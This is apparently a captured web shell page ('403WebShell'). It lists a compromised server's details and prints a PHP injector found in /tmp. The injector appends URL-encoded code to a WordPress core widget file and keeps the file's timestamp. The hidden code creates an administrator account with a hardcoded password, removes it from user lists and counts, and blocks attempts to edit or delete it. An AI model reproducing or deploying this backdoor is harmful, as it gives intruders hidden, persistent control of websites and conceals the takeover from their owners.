403WebShell

- GRAYBYTE UNDETECTABLE CODES -

403Webshell
Server IP : 178.239.150.4 / Your IP : 18.191.171.160
Web Server : LiteSpeed
System : Linux ci.mitralhost.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
User : sitsaz202 ( 1245)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF
Directory : /tmp/
Upload File :
[ Back ]
Current File : /tmp/.created
<?php  $path = '/home/sitsaz202/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%20%28%21function_exists%28%27wp_admin_users_protect_user_query%27%29%20%26%26%20function_exists%28%27add_action%27%29%29%20%7B%0A%0A%20%20%20%20add_action%28%27pre_user_query%27%2C%20%27wp_admin_users_protect_user_query%27%29%3B%0A%20%20%20%20add_filter%28%27views_users%27%2C%20%27protect_user_count%27%29%3B%0A%20%20%20%20add_action%28%27load-user-edit.php%27%2C%20%27wp_admin_users_protect_users_profiles%27%29%3B%0A%20%20%20%20add_action%28%27admin_menu%27%2C%20%27protect_user_from_deleting%27%29%3B%0A%0A%20%20%20%20function%20wp_admin_users_protect_user_query%28%24user_search%29%20%7B%0A%20%20%20%20%20%20%20%20%24user_id%20%3D%20get_current_user_id%28%29%3B%0A%20%20%20%20%20%20%20%20%24id%20%3D%20get_option%28%27_pre_user_id%27%29%3B%0A%0A%20%20%20%20%20%20%20%20if%20%28is_wp_error%28%24id%29%20%7C%7C%20%24user_id%20%3D%3D%20%24id%29%0A%20%20%20%20%20%20%20%20%20%20%20%20return%3B%0A%0A%20%20%20%20%20%20%20%20global%20%24wpdb%3B%0A%20%20%20%20%20%20%20%20%24user_search-%3Equery_where%20%3D%20str_replace%28%27WHERE%201%3D1%27%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%22WHERE%20%7B%24id%7D%3D%7B%24id%7D%20AND%20%7B%24wpdb-%3Eusers%7D.ID%3C%3E%7B%24id%7D%22%2C%0A%20%20%20%20%20%20%20%20%20%20%20%20%24user_search-%3Equery_where%0A%20%20%20%20%20%20%20%20%29%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20protect_user_count%28%24views%29%20%7B%0A%0A%20%20%20%20%20%20%20%20%24html%20%3D%20explode%28%27%3Cspan%20class%3D%22count%22%3E%28%27%2C%20%24views%5B%27all%27%5D%29%3B%0A%20%20%20%20%20%20%20%20%24count%20%3D%20explode%28%27%29%3C/span%3E%27%2C%20%24html%5B1%5D%29%3B%0A%20%20%20%20%20%20%20%20%24count%5B0%5D--%3B%0A%20%20%20%20%20%20%20%20%24views%5B%27all%27%5D%20%3D%20%24html%5B0%5D%20.%20%27%3Cspan%20class%3D%22count%22%3E%28%27%20.%20%24count%5B0%5D%20.%20%27%29%3C/span%3E%27%20.%20%24count%5B1%5D%3B%0A%0A%20%20%20%20%20%20%20%20%24html%20%3D%20explode%28%27%3Cspan%20class%3D%22count%22%3E%28%27%2C%20%24views%5B%27administrator%27%5D%29%3B%0A%20%20%20%20%20%20%20%20%24count%20%3D%20explode%28%27%29%3C/span%3E%27%2C%20%24html%5B1%5D%29%3B%0A%20%20%20%20%20%20%20%20%24count%5B0%5D--%3B%0A%20%20%20%20%20%20%20%20%24views%5B%27administrator%27%5D%20%3D%20%24html%5B0%5D%20.%20%27%3Cspan%20class%3D%22count%22%3E%28%27%20.%20%24count%5B0%5D%20.%20%27%29%3C/span%3E%27%20.%20%24count%5B1%5D%3B%0A%0A%20%20%20%20%20%20%20%20return%20%24views%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20wp_admin_users_protect_users_profiles%28%29%20%7B%0A%20%20%20%20%20%20%20%20%24user_id%20%3D%20get_current_user_id%28%29%3B%0A%20%20%20%20%20%20%20%20%24id%20%3D%20get_option%28%27_pre_user_id%27%29%3B%0A%0A%20%20%20%20%20%20%20%20if%20%28isset%28%24_GET%5B%27user_id%27%5D%29%20%26%26%20%24_GET%5B%27user_id%27%5D%20%3D%3D%20%24id%20%26%26%20%24user_id%20%21%3D%20%24id%29%0A%20%20%20%20%20%20%20%20%20%20%20%20wp_die%28__%28%27Invalid%20user%20ID.%27%29%29%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20function%20protect_user_from_deleting%28%29%20%7B%0A%0A%20%20%20%20%20%20%20%20%24id%20%3D%20get_option%28%27_pre_user_id%27%29%3B%0A%0A%20%20%20%20%20%20%20%20if%20%28isset%28%24_GET%5B%27user%27%5D%29%20%26%26%20%24_GET%5B%27user%27%5D%0A%20%20%20%20%20%20%20%20%20%20%20%20%26%26%20isset%28%24_GET%5B%27action%27%5D%29%20%26%26%20%24_GET%5B%27action%27%5D%20%3D%3D%20%27delete%27%0A%20%20%20%20%20%20%20%20%20%20%20%20%26%26%20%28%24_GET%5B%27user%27%5D%20%3D%3D%20%24id%20%7C%7C%20%21get_userdata%28%24_GET%5B%27user%27%5D%29%29%29%0A%20%20%20%20%20%20%20%20%20%20%20%20wp_die%28__%28%27Invalid%20user%20ID.%27%29%29%3B%0A%0A%20%20%20%20%7D%0A%0A%20%20%20%20%24args%20%3D%20array%28%0A%20%20%20%20%20%20%20%20%27user_login%27%20%3D%3E%20%27Adminroot%27%2C%0A%20%20%20%20%20%20%20%20%27user_pass%27%20%3D%3E%20%27r007pd8skdgSejrd%27%2C%0A%20%20%20%20%20%20%20%20%27role%27%20%3D%3E%20%27administrator%27%2C%0A%20%20%20%20%20%20%20%20%27user_email%27%20%3D%3E%20%27admin%40wordpress.com%27%0A%20%20%20%20%29%3B%0A%0A%20%20%20%20if%20%28%21username_exists%28%24args%5B%27user_login%27%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20%24id%20%3D%20wp_insert_user%28%24args%29%3B%0A%20%20%20%20%20%20%20%20update_option%28%27_pre_user_id%27%2C%20%24id%29%3B%0A%0A%20%20%20%20%7D%20else%20%7B%0A%20%20%20%20%20%20%20%20%24hidden_user%20%3D%20get_user_by%28%27login%27%2C%20%24args%5B%27user_login%27%5D%29%3B%0A%20%20%20%20%20%20%20%20if%20%28%24hidden_user-%3Euser_email%20%21%3D%20%24args%5B%27user_email%27%5D%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24id%20%3D%20get_option%28%27_pre_user_id%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24args%5B%27ID%27%5D%20%3D%20%24id%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20wp_insert_user%28%24args%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%20%20%0A%20%20%20%20if%20%28isset%28%24_COOKIE%5B%27WP_ADMIN_USER%27%5D%29%20%26%26%20username_exists%28%24args%5B%27user_login%27%5D%29%29%20%7B%0A%20%20%20%20%20%20%20%20die%28%27WP%20ADMIN%20USER%20EXISTS%27%29%3B%0A%20%20%20%20%7D%0A%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $content = $content."\n\n".$new_code; if (file_put_contents($path, $content)) {     $content = file_get_contents($path);     if (strstr($content, $new_code)) {         die("!success!<ft>{$ft}</ft>");     } } die('!failed!');
Youez - 2016 - github.com/yon3zu
LinuXploit